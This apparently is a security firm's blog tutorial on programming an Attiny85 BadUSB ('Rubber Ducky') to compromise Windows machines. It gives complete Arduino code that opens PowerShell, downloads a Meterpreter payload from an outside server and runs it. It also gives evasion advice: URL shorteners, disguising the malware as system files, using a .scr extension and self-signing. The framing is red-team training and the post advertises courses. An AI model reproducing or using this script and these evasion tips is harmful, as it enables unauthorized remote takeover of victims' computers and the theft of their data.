Attack Using BadUSB Devices or Rubber Ducky
1. Introduction and Objectives
In this article, we will conduct a practical study on how an organization can be compromised using a BadUSB device, whether it’s inserted into a computer by an attacker with physical access to the victim’s system or by an unsuspecting user who falls victim to deception.
We will get straight to the point without spending time on explanations about the technical features of these types of hardware or preparing Arduino IDE, as this information is readily available in numerous articles from other cybersecurity companies.
In this article, our focus will be on programming a BadUSB using an Attiny85 board, which can be easily obtained with a simple Google search at affordable prices. During the code development, we will encounter certain issues due to the nature of the board’s origin, as the hardware keyboard configurations will default to those of the country from which it was purchased.
To carry out this straightforward practice, you’ll need at least some basic knowledge of C/C++ programming.
The script code for compilation is published on our GitHub repository: https://github.com/JAYMONSECURITY/BADUSB
2. What does an attack with a BadUSB or Rubber Ducky entail?
An attack with a BadUSB device, also known as a “Rubber Ducky,” essentially involves inserting a device that looks like a USB into a computer system to execute commands on the victim system by simulating keyboard inputs.
In this manner, an attacker can directly insert the BadUSB or deceive a legitimate user into doing so. Once the BadUSB is inserted, it will rapidly type out the commands that we, as attackers, have programmed onto its onboard memory. This allows us to execute various actions, such as gaining access to sensitive information, data destruction, obtaining a command shell, and so on.
3. Possible Attack Scenarios
When it comes to potential scenarios for carrying out an attack of this type, we primarily encounter the following:
- The attacker leaves a BadUSB device abandoned in certain areas of the company, waiting for someone to connect it to their computer.
- The attacker could be an employee of the company with malicious intentions, who decides to introduce a BadUSB to compromise specific company computers. These attackers are referred to as “insiders.”
- The attacker could pose as a customer or visitor to the business, taking advantage of a specific moment to connect the BadUSB to publicly accessible computers.
For a more in-depth understanding of how harmful a device of this nature can be, I recommend reading the article by César Granda Fernández.
4. Laboratory Setup
To carry out this practice, we will need:
- Purchase the device that best suits our purposes. When making the purchase, it’s important to know the country of origin, as the “keyboard mode” configuration is likely to be based on that country’s keyboard layout. This could pose a challenge that we will need to overcome when programming the command execution script.
- Next, we need to install the Arduino software (IDE). This can be done on Windows, Linux, or Mac OS X without any issues. I will use a Windows 10 x64 environment for this purpose.
Once these two simple steps are completed, we are ready to program the script that will execute the commands we want on the victim machine.
5. Attack Design, Code Creation, and Compilation
Before beginning the code development, we must have a clear understanding of what we want to achieve as the final outcome.
Essentially, in a Red Team operation (RTO), the desired outcome is that when we, as attackers, or an unsuspecting user within the organization, insert the BadUSB into a machine, we can obtain a Meterpreter session or another type of command shell that allows us to conduct further post-exploitation activities on the organization’s systems. This would enable us to exfiltrate sensitive information to our Command and Control (C2) servers, perform vertical movements (privilege escalation), horizontal movements (lateral movement between machines), and much more.
To achieve this, our first step is to obtain the binary (trojan, sensor, implant, or whatever term we choose) that establishes a reverse connection to provide us with a Meterpreter session on the victim machine. In this practice, we won’t spend much time on this phase, so we will use a self-generated “Meterpreter” binary with “Msfvenom” as shown below:
Once we have the prepared binary, we proceed to host it on a server so that the BadUSB can download and self-execute it on the victim machine. In this case, I have chosen to upload it via FTPS to our JaymonSecurity.com server. The BadUSB will then download it using the HTTP protocol through the “BitsTransfer” module in PowerShell, enabling its subsequent execution on the victim machine.
Once we have set up the scenario to carry out the attack, we proceed to program the necessary code for the BadUSB to perform the actions described earlier.
6. Programming the Script and Compilation
Below is the source code of the C/C++ script that we need to compile using the Arduino IDE. Throughout the source code, I provide comments explaining what each instruction does, although some are quite obvious.
The code for the script to be compiled is published on our GitHub: https://github.com/JAYMONSECURITY/BADUSB
#include <Keyboard.h>
void setup() {
Keyboard.begin(); // Prepare the board for carrying out writing tasks on the connected machine.
delay(750);
/**************************************************************************************************************/
type(KEY_LEFT_GUI,false); //Pulse Ctrl + R
type('r',false);
Keyboard.releaseAll(); // Send the execution command to the board to carry out the aforementioned actions.
delay(750);
/********************************************************************************/
print(F("powershell")); // Enter the command "powershell" in the dialogue box and press "enter".
delay(500);
type(KEY_RETURN,false);
Keyboard.releaseAll();
delay(500);
/**********************************COMANDOS A EJECUTAR*************************/
//Proceed to type the following commands in the "Powershell" window:
print(F("\npowershell Import/Module BitsTransfer<")); // Set up the BitsTransfer module for downloading.
delay(100);
//The next command performs the download of the malware and stores it in %APPDATA% with the name Bicho.scr:
print(F("\nStart/BitsTransfer /Source http>&&jaymonsecurity.com&/Bicho.scr /Destination $env>APPDATA&Bicho.scr<"));
delay(100); //Give a reasonable amount of time for the download to complete successfully and to avoid race conditions:
print(F("\nStart/Process $env>APPDATA&Bicho.scr<")); // Execute the downloaded malware on the victim system
delay(100);
print(F("\nexit"));
delay(100);
/**************************************************************************************************************/
type(KEY_RETURN,false);
Keyboard.releaseAll(); // Send an execution command to the board to carry out the previous commands
Keyboard.end();
}
void type(int key, boolean release) {
Keyboard.press(key);
if(release)
Keyboard.release(key);
}
void print(const __FlashStringHelper *value) {
Keyboard.print(value);
}
void loop(){} When we refer to “board,” we are talking about the BadUSB device, which is essentially an Arduino board. The “delay” instructions are necessary to avoid potential race conditions. Regarding the commands written in the script, it’s important to note that they are written using characters different from the Spanish keyboard layout, and this is something that needs to be explained.
This BadUSB device uses a board that was manufactured and obtained from China, so the keyboard function offered by the board has a different layout from Spanish keyboards. This essentially means that the BadUSB interprets characters programmed for the Spanish keyboard differently, so we need to conduct a trial-and-error process to adjust the characters in a way that the board will interpret them correctly on the target system.
In this manner, we can observe in the script how, for example, to obtain the character ‘ / ‘, we need to type ‘ & ‘, to obtain ‘ – ‘, we need to type ‘ / ‘, and to obtain ‘ ; ‘, we need to type ‘ < ‘, among others.
To carry out the compilation using the Arduino IDE, I recommend taking a look at the following article:
It’s worth mentioning, as a curiosity, that when conducting a Red Team operation, the goal is to be as fast and stealthy as possible. For this reason, it’s advisable to shorten download links using URL shortening services (such as cutt.ly, bitly.com, etc.). While this article isn’t focused on malware analysis, I would like to mention that, logically, it’s beneficial for the malware to have a more “trustworthy” name, such as “System,” “Update,” “svchost,” etc. It should also have an extension that doesn’t raise suspicion, like “.scr” (screensaver), and ideally, it should possess a valid digital signature, even if it’s self-generated. The evasion of antivirus systems is truly an art, and I plan to cover the main principles of this process in a future article, aiming to provide insights into these techniques.
7. Execution of the BadUSB Operation
Below, we can see how after connecting the BadUSB device to a computer running Windows 10, it proceeds to execute the commands from the script programmed in the previous step.
First, it proceeds to download the “Meterpreter” type malware from the Jaymon Security server (http://jaymonsecurity.com/Bicho.scr) and saves it in the %APPDATA% directory of the victim machine with the name “Bicho.scr”. Then, it proceeds to execute it, and once it’s executed, the attacker gains full control of the victim machine, as shown in the following video where access to the victim’s webcam is demonstrated.
If you’re experiencing any viewing issues, you can watch the video through the following link:
https://www.youtube.com/watch?v=DPVl35N2tSw
8. Conclusions
In this article, we have briefly seen how to create your own script to operate a BadUSB or Rubber Ducky, which automates the execution of various commands on the system where it’s connected.
Through this, we have observed how an attacker can easily download and self-execute malware, gaining complete control over the victim’s machine, which can ultimately lead to compromising an entire business organization.
If you’re interested in acquiring introductory knowledge in ethical hacking, you can enroll in our basic ethical hacking course. Alternatively, if you’re looking to gain more advanced knowledge in offensive cybersecurity, you can explore our advanced course.
